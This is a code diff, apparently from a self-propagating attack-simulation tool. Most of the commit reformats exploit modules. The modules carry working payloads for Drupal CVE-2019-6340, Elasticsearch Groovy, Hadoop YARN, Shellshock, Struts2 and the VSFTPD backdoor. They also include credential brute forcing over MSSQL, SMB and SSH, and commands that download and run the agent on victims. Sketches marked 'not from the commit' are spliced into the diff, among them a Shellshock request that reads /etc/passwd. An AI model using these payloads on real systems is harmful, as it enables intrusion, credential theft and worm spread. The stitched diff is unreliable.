# Generally, should be True for RCE type exploiters and False if we don't expect the exploiter to run the monkey agent.
# Generally, should be True for RCE type exploiters and False if we don't expect the
# exploiter to run the monkey agent.
# Example: Zerologon steals credentials
RUNS_AGENT_ON_SUCCESS = True
@ -49,12 +49,12 @@ class HostExploiter(Plugin):
def __init__(self, host):
self._config = WormConfiguration
self.exploit_info = {
"display_name": self._EXPLOITED_SERVICE,
"started": "",
"finished": "",
"vulnerable_urls": [],
"vulnerable_ports": [],
"executed_cmds": [],
"display_name":self._EXPLOITED_SERVICE,
"started":"",
"finished":"",
"vulnerable_urls":[],
"vulnerable_ports":[],
"executed_cmds":[],
}
self.exploit_attempts = []
self.host = host
@ -76,12 +76,12 @@ class HostExploiter(Plugin):
def report_login_attempt(self, result, user, password="", lm_hash="", ntlm_hash="", ssh_key=""):
self.exploit_attempts.append(
{
"result": result,
"user": user,
"password": password,
"lm_hash": lm_hash,
"ntlm_hash": ntlm_hash,
"ssh_key": ssh_key,
"result":result,
"user":user,
"password":password,
"lm_hash":lm_hash,
"ntlm_hash":ntlm_hash,
"ssh_key":ssh_key,
}
)
@ -120,4 +120,4 @@ class HostExploiter(Plugin):
:param cmd: String of executed command. e.g. 'echo Example'
"""
powershell = True if "powershell" in cmd.lower() else False
self.exploit_info["executed_cmds"].append({"cmd": cmd, "powershell": powershell})
self.exploit_info["executed_cmds"].append({"cmd":cmd, "powershell":powershell})

View File

@ -1,7 +1,8 @@
"""
Remote Code Execution on Drupal server - CVE-2019-6340
Implementation is based on:
https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88/f9f6a5bb6605745e292bee3a4079f261d891738a.
https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88
/f9f6a5bb6605745e292bee3a4079f261d891738a.
"""
import logging
@ -28,7 +29,8 @@ class DrupalExploiter(WebRCE):
def get_exploit_config(self):
"""
We override this function because the exploits requires a special extension in the URL, "node",
We override this function because the exploits requires a special extension in the URL,
"node",
e.g. an exploited URL would be http://172.1.2.3:<port>/node/3.
:return: the Drupal exploit config
"""
@ -42,7 +44,8 @@ class DrupalExploiter(WebRCE):
def add_vulnerable_urls(self, potential_urls, stop_checking=False):
"""
We need a specific implementation of this function in order to add the URLs *with the node IDs*.
We need a specific implementation of this function in order to add the URLs *with the
node IDs*.
We therefore check, for every potential URL, all possible node IDs.
:param potential_urls: Potentially-vulnerable URLs
:param stop_checking: Stop if one vulnerable URL is found
@ -71,7 +74,8 @@ class DrupalExploiter(WebRCE):
def check_if_exploitable(self, url):
"""
Check if a certain URL is exploitable.
We use this specific implementation (and not simply run self.exploit) because this function does not "waste"
We use this specific implementation (and not simply run self.exploit) because this
function does not "waste"
a vulnerable URL. Namely, we're not actually exploiting, merely checking using a heuristic.
:param url: Drupal's URL and port
:return: Vulnerable URL if exploitable, otherwise False
@ -81,7 +85,7 @@ class DrupalExploiter(WebRCE):
response = requests.get(
f"{url}?_format=hal_json", # noqa: DUO123
json=payload,
headers={"Content-Type": "application/hal+json"},
headers={"Content-Type":"application/hal+json"},
verify=False,
timeout=MEDIUM_REQUEST_TIMEOUT,
)
@ -101,7 +105,7 @@ class DrupalExploiter(WebRCE):
r = requests.get(
f"{url}?_format=hal_json", # noqa: DUO123
json=payload,
headers={"Content-Type": "application/hal+json"},
headers={"Content-Type":"application/hal+json"},
verify=False,
timeout=LONG_REQUEST_TIMEOUT,
)
@ -117,7 +121,8 @@ class DrupalExploiter(WebRCE):
def get_target_url(self):
"""
We're overriding this method such that every time self.exploit is invoked, we use a fresh vulnerable URL.
We're overriding this method such that every time self.exploit is invoked, we use a fresh
vulnerable URL.
Reusing the same URL eliminates its exploitability because of caching reasons :)
:return: vulnerable URL to exploit
"""
@ -128,13 +133,15 @@ class DrupalExploiter(WebRCE):
For the Drupal exploit, 5 distinct URLs are needed to perform the full attack.
:return: Whether the list of vulnerable URLs has at least 5 elements.
"""
# We need 5 URLs for a "full-chain": check remote files, check architecture, drop monkey, chmod it and run it.
# We need 5 URLs for a "full-chain": check remote files, check architecture, drop monkey,
# chmod it and run it.
num_urls_needed_for_full_exploit = 5
num_available_urls = len(self.vulnerable_urls)
result = num_available_urls >= num_urls_needed_for_full_exploit
if not result:
LOG.info(
f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a Drupal server "
f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a "
f"Drupal server "
f"but only {num_available_urls} found"
)
return result
@ -164,20 +171,20 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100
def build_exploitability_check_payload(url):
payload = {
"_links": {"type": {"href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}},
"type": {"target_id": "article"},
"title": {"value": "My Article"},
"body": {"value": ""},
"_links":{"type":{"href":f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}},
"type":{"target_id":"article"},
"title":{"value":"My Article"},
"body":{"value":""},
}
return payload
def build_cmd_execution_payload(base, cmd):
payload = {
"link": [
"link":[
{
"value": "link",
"options": 'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
"value":"link",
"options":'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
'GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{s:5:"'
'close";a:2:{i:0;O:23:"GuzzleHttp\\HandlerStack":3:'
'{s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";'
@ -188,6 +195,6 @@ def build_cmd_execution_payload(base, cmd):
"".replace("|size|", str(len(cmd))).replace("|command|", cmd),
}
],
"_links": {"type": {"href": f"{urljoin(base, '/rest/type/shortcut/default')}"}},
"_links":{"type":{"href":f"{urljoin(base, '/rest/type/shortcut/default')}"}},
}
return payload


@ -1,6 +1,7 @@
"""
Implementation is based on elastic search groovy exploit by metasploit
https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66/modules/exploits/multi/elasticsearch/search_groovy_script.rb
https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66
/modules/exploits/multi/elasticsearch/search_groovy_script.rb
Max vulnerable elasticsearch version is "1.4.2"
"""
@ -37,7 +38,8 @@ class ElasticGroovyExploiter(WebRCE):
)
JAVA_CMD = (
GENERIC_QUERY
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(
\\"%s\\").getText()"""
)
_TARGET_OS_TYPE = ["linux", "windows"]
@ -51,13 +53,14 @@ class ElasticGroovyExploiter(WebRCE):
exploit_config["dropper"] = True
exploit_config["url_extensions"] = ["_search?pretty"]
exploit_config["upload_commands"] = {
"linux": WGET_HTTP_UPLOAD,
"windows": CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
"linux":WGET_HTTP_UPLOAD,
"windows":CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
}
return exploit_config
def get_open_service_ports(self, port_list, names):
# We must append elastic port we get from elastic fingerprint module because It's not marked as 'http' service
# We must append elastic port we get from elastic fingerprint module because It's not
# marked as 'http' service
valid_ports = super(ElasticGroovyExploiter, self).get_open_service_ports(port_list, names)
if ES_SERVICE in self.host.services:
valid_ports.append([ES_PORT, False])
@ -70,7 +73,8 @@ class ElasticGroovyExploiter(WebRCE):
response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT)
except requests.ReadTimeout:
LOG.error(
"Elastic couldn't upload monkey, because server didn't respond to upload request."
"Elastic couldn't upload monkey, because server didn't respond to upload "
"request."
)
return False
result = self.get_results(response)


@ -1,6 +1,7 @@
"""
Remote code execution on HADOOP server with YARN and default settings
Implementation is based on code from https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
Implementation is based on code from
https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
"""
import json
@ -63,7 +64,8 @@ class HadoopExploiter(WebRCE):
def exploit(self, url, command):
# Get the newly created application id
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
posixpath.join(url, "ws/v1/cluster/apps/new-application"),
timeout=LONG_REQUEST_TIMEOUT
)
resp = json.loads(resp.content)
app_id = resp["application-id"]
@ -73,7 +75,8 @@ class HadoopExploiter(WebRCE):
)
payload = self.build_payload(app_id, rand_name, command)
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload,
timeout=LONG_REQUEST_TIMEOUT
)
return resp.status_code == 202
@ -90,7 +93,8 @@ class HadoopExploiter(WebRCE):
def build_command(self, path, http_path):
# Build command to execute
monkey_cmd = build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
self.host, get_monkey_depth() - 1,
vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
)
if "linux" in self.host.os["type"]:
base_command = HADOOP_LINUX_COMMAND
@ -98,22 +102,22 @@ class HadoopExploiter(WebRCE):
base_command = HADOOP_WINDOWS_COMMAND
return base_command % {
"monkey_path": path,
"http_path": http_path,
"monkey_type": MONKEY_ARG,
"parameters": monkey_cmd,
"monkey_path":path,
"http_path":http_path,
"monkey_type":MONKEY_ARG,
"parameters":monkey_cmd,
}
@staticmethod
def build_payload(app_id, name, command):
payload = {
"application-id": app_id,
"application-name": name,
"am-container-spec": {
"commands": {
"command": command,
"application-id":app_id,
"application-name":name,
"am-container-spec":{
"commands":{
"command":command,
}
},
"application-type": "YARN",
"application-type":"YARN",
}
return payload


@ -56,7 +56,8 @@ class MSSQLExploiter(HostExploiter):
def _exploit_host(self):
"""
First this method brute forces to get the mssql connection (cursor).
Also, don't forget to start_monkey_server() before self.upload_monkey() and self.stop_monkey_server() after
Also, don't forget to start_monkey_server() before self.upload_monkey() and
self.stop_monkey_server() after
"""
# Brute force to get connection
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
@ -181,10 +182,12 @@ class MSSQLExploiter(HostExploiter):
Args:
host (str): Host ip address
port (str): Tcp port that the host listens to
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce with
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce
with
Return:
True or False depends if the whole bruteforce and attack process was completed successfully or not
True or False depends if the whole bruteforce and attack process was completed
successfully or not
"""
# Main loop
# Iterates on users list
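A minimal sketch of what this brute-force loop amounts to, assuming the pairs list is a sequence of (username, password) tuples and the pymssql driver used in the call shown below; the timeout value is an example.

# Illustrative sketch only (not from the commit).
import pymssql  # assumed driver, matching the connect call below

def try_brute_force(host, port, users_passwords_pairs_list):
    for user, password in users_passwords_pairs_list:
        try:
            conn = pymssql.connect(host, user, password, port=port, login_timeout=15)
            return conn  # first working credential pair wins
        except pymssql.Error:
            continue
    return None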
@ -196,9 +199,9 @@ class MSSQLExploiter(HostExploiter):
host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT
)
LOG.info(
"Successfully connected to host: {0}, using user: {1}, password (SHA-512): {2}".format(
host, user, self._config.hash_sensitive_data(password)
)
"Successfully connected to host: {0}, using user: {1}, password ("
"SHA-512): {2}".format(host, user,
self._config.hash_sensitive_data(password))
)
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
self.report_login_attempt(True, user, password)


@ -54,7 +54,8 @@ LOG = logging.getLogger(__name__)
class SambaCryExploiter(HostExploiter):
"""
SambaCry exploit module, partially based on the following implementation by CORE Security Technologies' impacket:
SambaCry exploit module, partially based on the following implementation by CORE Security
Technologies' impacket:
https://github.com/CoreSecurity/impacket/blob/master/examples/sambaPipe.py
"""
@ -94,7 +95,7 @@ class SambaCryExploiter(HostExploiter):
self.exploit_info["shares"] = {}
for share in writable_shares_creds_dict:
self.exploit_info["shares"][share] = {"creds": writable_shares_creds_dict[share]}
self.exploit_info["shares"][share] = {"creds":writable_shares_creds_dict[share]}
self.try_exploit_share(share, writable_shares_creds_dict[share])
# Wait for samba server to load .so, execute code and create result file.
@ -117,10 +118,10 @@ class SambaCryExploiter(HostExploiter):
if trigger_result is not None:
successfully_triggered_shares.append((share, trigger_result))
url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {
"username": creds["username"],
"host": self.host.ip_addr,
"port": self.SAMBA_PORT,
"share_name": share,
"username":creds["username"],
"host":self.host.ip_addr,
"port":self.SAMBA_PORT,
"share_name":share,
}
self.add_vuln_url(url)
self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share])
@ -194,7 +195,8 @@ class SambaCryExploiter(HostExploiter):
file_content = None
try:
file_id = smb_client.openFile(
tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME, desiredAccess=FILE_READ_DATA
tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME,
desiredAccess=FILE_READ_DATA
)
file_content = smb_client.readFile(tree_id, file_id)
smb_client.closeFile(tree_id, file_id)
@ -235,12 +237,12 @@ class SambaCryExploiter(HostExploiter):
creds = self._config.get_exploit_user_password_or_hash_product()
creds = [
{"username": user, "password": password, "lm_hash": lm_hash, "ntlm_hash": ntlm_hash}
{"username":user, "password":password, "lm_hash":lm_hash, "ntlm_hash":ntlm_hash}
for user, password, lm_hash, ntlm_hash in creds
]
# Add empty credentials for anonymous shares.
creds.insert(0, {"username": "", "password": "", "lm_hash": "", "ntlm_hash": ""})
creds.insert(0, {"username":"", "password":"", "lm_hash":"", "ntlm_hash":""})
return creds
@ -266,7 +268,7 @@ class SambaCryExploiter(HostExploiter):
pattern_result = pattern.search(smb_server_name)
is_vulnerable = False
if pattern_result is not None:
samba_version = smb_server_name[pattern_result.start() : pattern_result.end()]
samba_version = smb_server_name[pattern_result.start(): pattern_result.end()]
samba_version_parts = samba_version.split(".")
if (samba_version_parts[0] == "3") and (samba_version_parts[1] >= "5"):
is_vulnerable = True
@ -372,7 +374,8 @@ class SambaCryExploiter(HostExploiter):
# the extra / on the beginning is required for the vulnerability
self.open_pipe(smb_client, "/" + module_path)
except Exception as e:
# This is the expected result. We can't tell whether we succeeded or not just by this error code.
# This is the expected result. We can't tell whether we succeeded or not just by this
# error code.
if str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
return True
else:
@ -403,7 +406,8 @@ class SambaCryExploiter(HostExploiter):
return BytesIO(
DROPPER_ARG
+ build_monkey_commandline(
self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT, str(location)
self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT,
str(location)
)
)
@ -450,7 +454,8 @@ class SambaCryExploiter(HostExploiter):
)
return smb_client
# Following are slightly modified SMB functions from impacket to fit our needs of the vulnerability #
# Following are slightly modified SMB functions from impacket to fit our needs of the
# vulnerability #
@staticmethod
def create_smb(
smb_client,
@ -513,7 +518,8 @@ class SambaCryExploiter(HostExploiter):
@staticmethod
def open_pipe(smb_client, pathName):
# We need to overwrite Impacket's openFile functions since they automatically convert paths to NT style
# We need to overwrite Impacket's openFile functions since they automatically convert
# paths to NT style
# to make things easier for the caller. Not this time ;)
treeId = smb_client.connectTree("IPC$")
LOG.debug("Triggering path: %s" % pathName)


@ -1,4 +1,5 @@
# Implementation is based on shellshock script provided https://github.com/nccgroup/shocker/blob/master/shocker.py
# Implementation is based on shellshock script provided
# https://github.com/nccgroup/shocker/blob/master/shocker.py
import logging
import string
@ -28,7 +29,7 @@ LOCK_HELPER_FILE = "/tmp/monkey_shellshock"
class ShellShockExploiter(HostExploiter):
_attacks = {"Content-type": "() { :;}; echo; "}
_attacks = {"Content-type":"() { :;}; echo; "}
_TARGET_OS_TYPE = ["linux"]
_EXPLOITED_SERVICE = "Bash"
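For context, Shellshock is triggered by sending a header whose value starts with the function-definition string in _attacks above, with the command to run appended after it. The sketch below is illustrative only; the URL and injected command are made-up examples.

# Illustrative sketch only (not from the commit).
import requests

url = "http://10.0.0.5/cgi-bin/status"           # hypothetical CGI endpoint
attack = "() { :;}; echo; /bin/cat /etc/passwd"  # prefix from _attacks + command
response = requests.get(url, headers={"Content-type": attack}, verify=False, timeout=10)
print(response.content.decode())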
@ -44,7 +45,7 @@ class ShellShockExploiter(HostExploiter):
def _exploit_host(self):
# start by picking ports
candidate_services = {
service: self.host.services[service]
service:self.host.services[service]
for service in self.host.services
if ("name" in self.host.services[service])
and (self.host.services[service]["name"] == "http")
@ -113,7 +114,8 @@ class ShellShockExploiter(HostExploiter):
self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)
):
LOG.info(
"Host %s was already infected under the current configuration, done" % self.host
"Host %s was already infected under the current configuration, "
"done" % self.host
)
return True # return already infected
@ -241,7 +243,7 @@ class ShellShockExploiter(HostExploiter):
LOG.debug("Header is: %s" % header)
LOG.debug("Attack is: %s" % attack)
r = requests.get(
url, headers={header: attack}, verify=False, timeout=TIMEOUT
url, headers={header:attack}, verify=False, timeout=TIMEOUT
) # noqa: DUO123
result = r.content.decode()
return result
@ -270,7 +272,8 @@ class ShellShockExploiter(HostExploiter):
break
if timeout:
LOG.debug(
"Some connections timed out while sending request to potentially vulnerable urls."
"Some connections timed out while sending request to potentially vulnerable "
"urls."
)
valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
urls = [resp.url for resp in valid_resps]


@ -24,8 +24,8 @@ class SmbExploiter(HostExploiter):
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
_EXPLOITED_SERVICE = "SMB"
KNOWN_PROTOCOLS = {
"139/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 139),
"445/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 445),
"139/SMB":(r"ncacn_np:%s[\pipe\svcctl]", 139),
"445/SMB":(r"ncacn_np:%s[\pipe\svcctl]", 445),
}
USE_KERBEROS = False
@ -75,7 +75,8 @@ class SmbExploiter(HostExploiter):
if remote_full_path is not None:
LOG.debug(
"Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) %s : (SHA-512) %s)",
"Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) "
"%s : (SHA-512) %s)",
self.host,
user,
self._config.hash_sensitive_data(password),
@ -99,7 +100,8 @@ class SmbExploiter(HostExploiter):
except Exception as exc:
LOG.debug(
"Exception when trying to copy file using SMB to %r with user:"
" %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s: (%s)",
" %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash ("
"SHA-512): %s: (%s)",
self.host,
user,
self._config.hash_sensitive_data(password),
@ -117,7 +119,7 @@ class SmbExploiter(HostExploiter):
# execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {
"dropper_path": remote_full_path
"dropper_path":remote_full_path
} + build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
@ -126,7 +128,7 @@ class SmbExploiter(HostExploiter):
)
else:
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {
"monkey_path": remote_full_path
"monkey_path":remote_full_path
} + build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=self.vulnerable_port
)


@ -58,7 +58,8 @@ class SSHExploiter(HostExploiter):
try:
ssh.connect(self.host.ip_addr, username=user, pkey=pkey, port=port)
LOG.debug(
"Successfully logged in %s using %s users private key", self.host, ssh_string
"Successfully logged in %s using %s users private key", self.host,
ssh_string
)
self.report_login_attempt(True, user, ssh_key=ssh_string)
return ssh
@ -157,7 +158,8 @@ class SSHExploiter(HostExploiter):
if stdout_res:
# file exists
LOG.info(
"Host %s was already infected under the current configuration, done" % self.host
"Host %s was already infected under the current configuration, "
"done" % self.host
)
return True # return already infected


@ -35,7 +35,8 @@ class Struts2Exploiter(WebRCE):
def build_potential_urls(self, ports, extensions=None):
"""
We need to override this method to get redirected url's
:param ports: Array of ports. One port is described as size 2 array: [port.no(int), isHTTPS?(bool)]
:param ports: Array of ports. One port is described as size 2 array: [port.no(int),
isHTTPS?(bool)]
Eg. ports: [[80, False], [443, True]]
:param extensions: What subdirectories to scan. www.domain.com[/extension]
:return: Array of url's to try and attack
@ -47,7 +48,7 @@ class Struts2Exploiter(WebRCE):
@staticmethod
def get_redirected(url):
# Returns false if url is not right
headers = {"User-Agent": "Mozilla/5.0"}
headers = {"User-Agent":"Mozilla/5.0"}
request = urllib.request.Request(url, headers=headers)
try:
return urllib.request.urlopen(
@ -84,7 +85,7 @@ class Struts2Exploiter(WebRCE):
"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
"(#ros.flush())}" % cmd
)
headers = {"User-Agent": "Mozilla/5.0", "Content-Type": payload}
headers = {"User-Agent":"Mozilla/5.0", "Content-Type":payload}
try:
request = urllib.request.Request(url, headers=headers)
# Timeout added or else we would wait for all monkeys' output


@ -26,12 +26,12 @@ def zerologon_exploiter_object(monkeypatch):
def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object):
dummy_exploit_attempt_result = {"ErrorCode": 0}
dummy_exploit_attempt_result = {"ErrorCode":0}
assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result)
def test_assess_exploit_attempt_result_with_error(zerologon_exploiter_object):
dummy_exploit_attempt_result = {"ErrorCode": 1}
dummy_exploit_attempt_result = {"ErrorCode":1}
assert not zerologon_exploiter_object.assess_exploit_attempt_result(
dummy_exploit_attempt_result
)
@ -56,15 +56,15 @@ def test__extract_user_creds_from_secrets_good_data(zerologon_exploiter_object):
f"{USERS[i]}:{RIDS[i]}:{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS))
]
expected_extracted_creds = {
USERS[0]: {
"RID": int(RIDS[0]),
"lm_hash": LM_HASHES[0],
"nt_hash": NT_HASHES[0],
USERS[0]:{
"RID":int(RIDS[0]),
"lm_hash":LM_HASHES[0],
"nt_hash":NT_HASHES[0],
},
USERS[1]: {
"RID": int(RIDS[1]),
"lm_hash": LM_HASHES[1],
"nt_hash": NT_HASHES[1],
USERS[1]:{
"RID":int(RIDS[1]),
"lm_hash":LM_HASHES[1],
"nt_hash":NT_HASHES[1],
},
}
assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None
@ -76,8 +76,8 @@ def test__extract_user_creds_from_secrets_bad_data(zerologon_exploiter_object):
f"{USERS[i]}:{RIDS[i]}:::{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS))
]
expected_extracted_creds = {
USERS[0]: {"RID": int(RIDS[0]), "lm_hash": "", "nt_hash": ""},
USERS[1]: {"RID": int(RIDS[1]), "lm_hash": "", "nt_hash": ""},
USERS[0]:{"RID":int(RIDS[0]), "lm_hash":"", "nt_hash":""},
USERS[1]:{"RID":int(RIDS[1]), "lm_hash":"", "nt_hash":""},
}
assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None
assert zerologon_exploiter_object._extracted_creds == expected_extracted_creds


@ -29,7 +29,8 @@ def get_target_monkey(host):
if not monkey_path:
if host.os.get("type") == platform.system().lower():
# if exe not found, and we have the same arch or arch is unknown and we are 32bit, use our exe
# if exe not found, and we have the same arch or arch is unknown and we are 32bit,
# use our exe
if (not host.os.get("machine") and sys.maxsize < 2 ** 32) or host.os.get(
"machine", ""
).lower() == platform.machine().lower():


@ -17,7 +17,8 @@ class Payload(object):
def get_payload(self, command=""):
"""
Returns prefixed and suffixed command (payload)
:param command: Command to suffix/prefix. If no command is passed than objects' property is used
:param command: Command to suffix/prefix. If no command is passed than objects' property
is used
:return: prefixed and suffixed command (full payload)
"""
if not command:
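A short usage sketch of what get_payload composes (prefix + command + suffix), assuming the constructor signature shown in the test further down; values here are examples.

# Illustrative sketch only (not from the commit).
pld = LimitedSizePayload("whoami", max_length=40, prefix='sh -c "', suffix='"')
print(pld.get_payload())      # -> sh -c "whoami"   (uses the stored command)
print(pld.get_payload("id"))  # -> sh -c "id"       (explicit command overrides it)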
@ -46,7 +47,8 @@ class LimitedSizePayload(Payload):
def split_into_array_of_smaller_payloads(self):
if self.is_suffix_and_prefix_too_long():
raise Exception(
"Can't split command into smaller sub-commands because commands' prefix and suffix already "
"Can't split command into smaller sub-commands because commands' prefix and "
"suffix already "
"exceeds required length of command."
)


@ -32,7 +32,8 @@ class TestPayload(TestCase):
pld2 = LimitedSizePayload(test_str2, max_length=16, prefix="prefix", suffix="suffix")
array2 = pld2.split_into_array_of_smaller_payloads()
test2 = bool(
array2[0] == "prefix1234suffix" and array2[1] == "prefix5678suffix" and len(array2) == 2
array2[0] == "prefix1234suffix" and array2[1] == "prefix5678suffix" and len(
array2) == 2
)
assert test1 and test2


@ -36,7 +36,8 @@ class SmbTools(object):
# skip guest users
if smb.isGuestSession() > 0:
LOG.debug(
"Connection to %r granted guest privileges with user: %s, password (SHA-512): '%s',"
"Connection to %r granted guest privileges with user: %s, password (SHA-512): "
"'%s',"
" LM hash (SHA-512): %s, NTLM hash (SHA-512): %s",
host,
username,
@ -59,12 +60,12 @@ class SmbTools(object):
return None
info = {
"major_version": resp["InfoStruct"]["ServerInfo102"]["sv102_version_major"],
"minor_version": resp["InfoStruct"]["ServerInfo102"]["sv102_version_minor"],
"server_name": resp["InfoStruct"]["ServerInfo102"]["sv102_name"].strip("\0 "),
"server_comment": resp["InfoStruct"]["ServerInfo102"]["sv102_comment"].strip("\0 "),
"server_user_path": resp["InfoStruct"]["ServerInfo102"]["sv102_userpath"].strip("\0 "),
"simultaneous_users": resp["InfoStruct"]["ServerInfo102"]["sv102_users"],
"major_version":resp["InfoStruct"]["ServerInfo102"]["sv102_version_major"],
"minor_version":resp["InfoStruct"]["ServerInfo102"]["sv102_version_minor"],
"server_name":resp["InfoStruct"]["ServerInfo102"]["sv102_name"].strip("\0 "),
"server_comment":resp["InfoStruct"]["ServerInfo102"]["sv102_comment"].strip("\0 "),
"server_user_path":resp["InfoStruct"]["ServerInfo102"]["sv102_userpath"].strip("\0 "),
"simultaneous_users":resp["InfoStruct"]["ServerInfo102"]["sv102_users"],
}
LOG.debug("Connected to %r using %s:\n%s", host, dialect, pprint.pformat(info))
@ -102,10 +103,10 @@ class SmbTools(object):
)
continue
share_info = {"share_name": share_name, "share_path": share_path}
share_info = {"share_name":share_name, "share_path":share_path}
if dst_path.lower().startswith(share_path.lower()):
high_priority_shares += ((ntpath.sep + dst_path[len(share_path) :], share_info),)
high_priority_shares += ((ntpath.sep + dst_path[len(share_path):], share_info),)
low_priority_shares += ((ntpath.sep + file_name, share_info),)
@ -127,7 +128,8 @@ class SmbTools(object):
smb.connectTree(share_name)
except Exception as exc:
LOG.debug(
"Error connecting tree to share '%s' on victim %r: %s", share_name, host, exc
"Error connecting tree to share '%s' on victim %r: %s", share_name, host,
exc
)
continue
@ -151,7 +153,8 @@ class SmbTools(object):
return remote_full_path
LOG.debug(
"Remote monkey file is found but different, moving along with attack"
"Remote monkey file is found but different, moving along with "
"attack"
)
except Exception:
pass # file isn't found on remote victim, moving on
@ -164,7 +167,8 @@ class SmbTools(object):
file_uploaded = True
T1105Telem(
ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr, dst_path
ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr,
dst_path
).send()
LOG.info(
"Copied monkey file '%s' to remote share '%s' [%s] on victim %r",
@ -177,7 +181,8 @@ class SmbTools(object):
break
except Exception as exc:
LOG.debug(
"Error uploading monkey to share '%s' on victim %r: %s", share_name, host, exc
"Error uploading monkey to share '%s' on victim %r: %s", share_name, host,
exc
)
T1105Telem(
ScanStatus.SCANNED,
@ -197,7 +202,8 @@ class SmbTools(object):
if not file_uploaded:
LOG.debug(
"Couldn't find a writable share for exploiting victim %r with "
"username: %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s",
"username: %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash ("
"SHA-512): %s",
host,
username,
Configuration.hash_sensitive_data(password),
@ -222,9 +228,9 @@ class SmbTools(object):
return None, None
dialect = {
SMB_DIALECT: "SMBv1",
SMB2_DIALECT_002: "SMBv2.0",
SMB2_DIALECT_21: "SMBv2.1",
SMB_DIALECT:"SMBv1",
SMB2_DIALECT_002:"SMBv2.0",
SMB2_DIALECT_21:"SMBv2.1",
}.get(smb.getDialect(), "SMBv3.0")
# we know this should work because the WMI connection worked


@ -1,6 +1,7 @@
"""
Implementation is based on VSFTPD v2.3.4 Backdoor Command Execution exploit by metasploit
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp
/vsftpd_234_backdoor.rb
only vulnerable version is "2.3.4"
"""
@ -121,7 +122,7 @@ class VSFTPDExploiter(HostExploiter):
# Upload the monkey to the machine
monkey_path = dropper_target_path_linux
download_command = WGET_HTTP_UPLOAD % {"monkey_path": monkey_path, "http_path": http_path}
download_command = WGET_HTTP_UPLOAD % {"monkey_path":monkey_path, "http_path":http_path}
download_command = str.encode(str(download_command) + "\n")
LOG.info("Download command is %s", download_command)
if self.socket_send(backdoor_socket, download_command):
@ -134,7 +135,7 @@ class VSFTPDExploiter(HostExploiter):
http_thread.stop()
# Change permissions
change_permission = CHMOD_MONKEY % {"monkey_path": monkey_path}
change_permission = CHMOD_MONKEY % {"monkey_path":monkey_path}
change_permission = str.encode(str(change_permission) + "\n")
LOG.info("change_permission command is %s", change_permission)
backdoor_socket.send(change_permission)
@ -145,13 +146,14 @@ class VSFTPDExploiter(HostExploiter):
